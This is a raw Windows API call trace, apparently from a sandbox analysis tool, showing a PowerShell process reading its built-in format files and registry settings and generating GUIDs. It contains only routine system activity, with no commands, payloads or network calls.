	[0337.529] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.529] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.530] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.530] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.530] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.530] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.530] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.532] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.532] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0xbce, lpOverlapped=0x0) returned 1
	[0337.532] ReadFile (in: hFile=0x32c, lpBuffer=0x3490dde, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3490dde*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0337.532] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0337.532] CloseHandle (hObject=0x32c) returned 1
	[0337.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0337.532] SetErrorMode (uMode=0x1) returned 0x1
	[0337.533] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d0a0 | out: lpFileInformation=0x14d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0337.533] SetErrorMode (uMode=0x1) returned 0x1
	[0337.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0337.533] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d188 | out: phkResult=0x14d188*=0x32c) returned 0x0
	[0337.533] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d10c, lpData=0x0, lpcbData=0x14d108*=0x0 | out: lpType=0x14d10c*=0x1, lpData=0x0, lpcbData=0x14d108*=0x56) returned 0x0
	[0337.533] CoTaskMemAlloc (cb=0x5a) returned 0x28fe50
	[0337.533] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d0dc, lpData=0x28fe50, lpcbData=0x14d0d8*=0x56 | out: lpType=0x14d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d0d8*=0x56) returned 0x0
	[0337.533] CoTaskMemFree (pv=0x28fe50) 
	[0337.533] RegCloseKey (hKey=0x32c) returned 0x0
	[0337.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0337.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0337.552] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x934b4512, Data2=0x2f3a, Data3=0x4705, Data4=([0]=0xa8, [1]=0x9d, [2]=0x46, [3]=0x8e, [4]=0xa4, [5]=0xea, [6]=0x63, [7]=0x7c))) returned 0x0
	[0337.552] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x34ffdb6f, Data2=0x986b, Data3=0x4247, Data4=([0]=0x91, [1]=0xee, [2]=0x9f, [3]=0xcb, [4]=0x4c, [5]=0xbb, [6]=0x27, [7]=0x1a))) returned 0x0
	[0337.552] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x4c83eb2d, Data2=0x584b, Data3=0x4c43, Data4=([0]=0xa9, [1]=0x87, [2]=0x12, [3]=0xd0, [4]=0xc4, [5]=0xdb, [6]=0xe1, [7]=0x58))) returned 0x0
	[0337.552] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x3d5d8c9a, Data2=0xbbfd, Data3=0x4fbb, Data4=([0]=0x8b, [1]=0x6d, [2]=0x45, [3]=0x51, [4]=0x3e, [5]=0x35, [6]=0x96, [7]=0xf8))) returned 0x0
	[0337.552] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x6f0a0eef, Data2=0x76f1, Data3=0x4931, Data4=([0]=0x90, [1]=0xb7, [2]=0xed, [3]=0xdb, [4]=0xc2, [5]=0xde, [6]=0xc1, [7]=0x7a))) returned 0x0
	[0337.553] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xea1c6252, Data2=0x51bc, Data3=0x4524, Data4=([0]=0x95, [1]=0x22, [2]=0x6e, [3]=0x38, [4]=0xf3, [5]=0x5d, [6]=0x28, [7]=0x51))) returned 0x0
	[0337.553] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.554] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xeaee125d, Data2=0x403b, Data3=0x4942, Data4=([0]=0x94, [1]=0xc7, [2]=0xa, [3]=0x9f, [4]=0xc8, [5]=0x20, [6]=0x94, [7]=0x59))) returned 0x0
	[0337.554] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.555] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.555] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xa1ead2ca, Data2=0x612c, Data3=0x40be, Data4=([0]=0xa9, [1]=0x95, [2]=0x11, [3]=0xb5, [4]=0x71, [5]=0x28, [6]=0x75, [7]=0x3))) returned 0x0
	[0337.556] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xdb9bd725, Data2=0xef60, Data3=0x418d, Data4=([0]=0xbc, [1]=0xe1, [2]=0x8, [3]=0x6, [4]=0x14, [5]=0x80, [6]=0x52, [7]=0xe1))) returned 0x0
	[0337.556] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x366dabe1, Data2=0xf6a9, Data3=0x44fd, Data4=([0]=0x93, [1]=0xe6, [2]=0xa3, [3]=0x95, [4]=0x53, [5]=0x52, [6]=0xae, [7]=0xda))) returned 0x0
	[0337.556] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x7ce9c1ef, Data2=0x7118, Data3=0x4170, Data4=([0]=0xb4, [1]=0xe6, [2]=0xb0, [3]=0x3b, [4]=0x43, [5]=0x23, [6]=0x68, [7]=0x91))) returned 0x0
	[0337.556] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.557] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x214411ab, Data2=0x8421, Data3=0x4bf2, Data4=([0]=0x89, [1]=0x9b, [2]=0xe, [3]=0x7e, [4]=0xde, [5]=0x2a, [6]=0x5f, [7]=0xc8))) returned 0x0
	[0337.557] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.558] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.559] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.559] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.559] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.560] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x7af2f86b, Data2=0x2b7d, Data3=0x4145, Data4=([0]=0xb1, [1]=0xe7, [2]=0x34, [3]=0xf6, [4]=0x58, [5]=0xad, [6]=0x13, [7]=0x61))) returned 0x0
	[0337.560] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x66794bf, Data2=0x2fbe, Data3=0x4e31, Data4=([0]=0xb1, [1]=0x73, [2]=0x8f, [3]=0x24, [4]=0x37, [5]=0x1e, [6]=0x83, [7]=0xe8))) returned 0x0
	[0337.560] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xbdd824de, Data2=0x6c53, Data3=0x4fda, Data4=([0]=0x83, [1]=0xfc, [2]=0xc1, [3]=0x9b, [4]=0x19, [5]=0x73, [6]=0xd8, [7]=0xbf))) returned 0x0
	[0337.560] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe7bdb7fd, Data2=0x3eac, Data3=0x447e, Data4=([0]=0xb6, [1]=0xf1, [2]=0xcf, [3]=0x83, [4]=0x31, [5]=0xbf, [6]=0x93, [7]=0x55))) returned 0x0
	[0337.560] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x33ed4378, Data2=0xff61, Data3=0x4c29, Data4=([0]=0x9c, [1]=0xae, [2]=0x4b, [3]=0x43, [4]=0x7c, [5]=0xcd, [6]=0xc1, [7]=0x62))) returned 0x0
	[0337.560] VirtualQuery (in: lpAddress=0x14c020, lpBuffer=0x14cee0, dwLength=0x30 | out: lpBuffer=0x14cee0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.560] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x248e5d13, Data2=0xc312, Data3=0x4105, Data4=([0]=0xb4, [1]=0x4, [2]=0x4f, [3]=0xe, [4]=0x6f, [5]=0xdb, [6]=0x39, [7]=0x16))) returned 0x0
	[0337.561] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x7b47f393, Data2=0xa6d9, Data3=0x4e86, Data4=([0]=0xae, [1]=0x6f, [2]=0xb6, [3]=0x40, [4]=0xb5, [5]=0x17, [6]=0xc2, [7]=0xb8))) returned 0x0
	[0337.561] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x56fb3840, Data2=0xdc7a, Data3=0x45e0, Data4=([0]=0xad, [1]=0xbb, [2]=0xb, [3]=0x2d, [4]=0x53, [5]=0x78, [6]=0x9, [7]=0xf2))) returned 0x0
	[0337.561] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x9ca2d86c, Data2=0x773a, Data3=0x4832, Data4=([0]=0xac, [1]=0xfa, [2]=0x91, [3]=0x18, [4]=0xb3, [5]=0x62, [6]=0x32, [7]=0xb))) returned 0x0
	[0337.561] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x99787030, Data2=0xc6ad, Data3=0x4801, Data4=([0]=0x8a, [1]=0x20, [2]=0xcd, [3]=0xb4, [4]=0xc1, [5]=0x85, [6]=0xcb, [7]=0x54))) returned 0x0
	[0337.561] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x6962f1c2, Data2=0xd347, Data3=0x4742, Data4=([0]=0x88, [1]=0xd3, [2]=0x86, [3]=0xe6, [4]=0x74, [5]=0x24, [6]=0x1e, [7]=0x5f))) returned 0x0
	[0337.561] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xba5e86d2, Data2=0xe7, Data3=0x4f32, Data4=([0]=0x8d, [1]=0x9e, [2]=0xca, [3]=0x4a, [4]=0x29, [5]=0x17, [6]=0xf2, [7]=0x41))) returned 0x0
	[0337.561] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x8a479e91, Data2=0x2b25, Data3=0x4121, Data4=([0]=0x89, [1]=0x45, [2]=0x5b, [3]=0x2f, [4]=0xf, [5]=0x41, [6]=0x9e, [7]=0x44))) returned 0x0
	[0337.562] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x75f93808, Data2=0x5322, Data3=0x4e12, Data4=([0]=0x86, [1]=0x8f, [2]=0x29, [3]=0x83, [4]=0x3b, [5]=0x97, [6]=0x75, [7]=0xce))) returned 0x0
	[0337.562] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x6a973462, Data2=0x5118, Data3=0x4cfa, Data4=([0]=0xb7, [1]=0x8d, [2]=0x6f, [3]=0x1f, [4]=0xbf, [5]=0xc3, [6]=0x88, [7]=0xd5))) returned 0x0
	[0337.562] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe658842e, Data2=0x5d55, Data3=0x49e9, Data4=([0]=0xbd, [1]=0x0, [2]=0x41, [3]=0x8b, [4]=0x8a, [5]=0xe6, [6]=0xeb, [7]=0xc))) returned 0x0
	[0337.562] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xc2620ce, Data2=0x17ad, Data3=0x4a7f, Data4=([0]=0xae, [1]=0x10, [2]=0xc0, [3]=0x62, [4]=0x54, [5]=0x8f, [6]=0x92, [7]=0xc6))) returned 0x0
	[0337.562] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x28eece9d, Data2=0xc468, Data3=0x4b43, Data4=([0]=0xb4, [1]=0xa8, [2]=0xe7, [3]=0x45, [4]=0x9, [5]=0xfa, [6]=0x16, [7]=0x4b))) returned 0x0
	[0337.562] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x534a1844, Data2=0xf7f4, Data3=0x48b2, Data4=([0]=0x8b, [1]=0x72, [2]=0xc6, [3]=0xd0, [4]=0x5e, [5]=0xc8, [6]=0xc7, [7]=0xe5))) returned 0x0
	[0337.562] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe4c7cd0c, Data2=0x9516, Data3=0x4b65, Data4=([0]=0x8f, [1]=0x3, [2]=0x15, [3]=0xd8, [4]=0x4b, [5]=0x4a, [6]=0x8, [7]=0x99))) returned 0x0
	[0337.563] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x461396e8, Data2=0xb8dc, Data3=0x4b3f, Data4=([0]=0xae, [1]=0x6, [2]=0xe, [3]=0xdc, [4]=0xcb, [5]=0xe, [6]=0x19, [7]=0xec))) returned 0x0
	[0337.563] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x30a42615, Data2=0xed90, Data3=0x46b2, Data4=([0]=0x9f, [1]=0xab, [2]=0x99, [3]=0xb8, [4]=0x6d, [5]=0xd3, [6]=0x34, [7]=0x48))) returned 0x0
	[0337.563] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xa9e8bda2, Data2=0x9ca4, Data3=0x406d, Data4=([0]=0xa3, [1]=0xac, [2]=0x95, [3]=0x75, [4]=0x17, [5]=0x14, [6]=0x10, [7]=0xc6))) returned 0x0
	[0337.563] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xefa2ae8d, Data2=0xbfee, Data3=0x4401, Data4=([0]=0xa4, [1]=0xd6, [2]=0xa5, [3]=0xb4, [4]=0x3d, [5]=0x21, [6]=0x23, [7]=0x2f))) returned 0x0
	[0337.563] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.563] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.564] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.564] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xca9c64a4, Data2=0x4c72, Data3=0x491d, Data4=([0]=0x85, [1]=0x8d, [2]=0x5c, [3]=0xd0, [4]=0xdf, [5]=0xd7, [6]=0xb7, [7]=0x6))) returned 0x0
	[0337.564] SetErrorMode (uMode=0x1) returned 0x1
	[0337.564] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0337.565] GetFileType (hFile=0x2e4) returned 0x1
	[0337.565] SetErrorMode (uMode=0x1) returned 0x1
	[0337.565] GetFileType (hFile=0x2e4) returned 0x1
	[0337.565] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e12a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e12a78*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.566] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e12a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e12a78*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.566] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e12a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e12a78*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.566] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e12a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e12a78*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.566] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e12a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e12a78*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.566] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e12a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e12a78*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.566] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e12a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e12a78*, lpNumberOfBytesRead=0x14d0f8*=0x119, lpOverlapped=0x0) returned 1
	[0337.567] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e12a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x2e12a78*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0337.567] SetErrorMode (uMode=0x1) returned 0x1
	[0337.567] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d0a0 | out: lpFileInformation=0x14d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0337.567] SetErrorMode (uMode=0x1) returned 0x1
	[0337.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0337.567] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d188 | out: phkResult=0x14d188*=0x2e4) returned 0x0
	[0337.567] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d10c, lpData=0x0, lpcbData=0x14d108*=0x0 | out: lpType=0x14d10c*=0x1, lpData=0x0, lpcbData=0x14d108*=0x56) returned 0x0
	[0337.567] CoTaskMemAlloc (cb=0x5a) returned 0x1b724740
	[0337.567] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d0dc, lpData=0x1b724740, lpcbData=0x14d0d8*=0x56 | out: lpType=0x14d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d0d8*=0x56) returned 0x0
	[0337.567] CoTaskMemFree (pv=0x1b724740) 
	[0337.568] RegCloseKey (hKey=0x2e4) returned 0x0
	[0337.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0337.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0337.568] VirtualQuery (in: lpAddress=0x14bc20, lpBuffer=0x14cae0, dwLength=0x30 | out: lpBuffer=0x14cae0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.568] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xb6183033, Data2=0x1f4a, Data3=0x4ea6, Data4=([0]=0x85, [1]=0xb3, [2]=0x86, [3]=0x13, [4]=0x6e, [5]=0xb, [6]=0x1b, [7]=0xc9))) returned 0x0
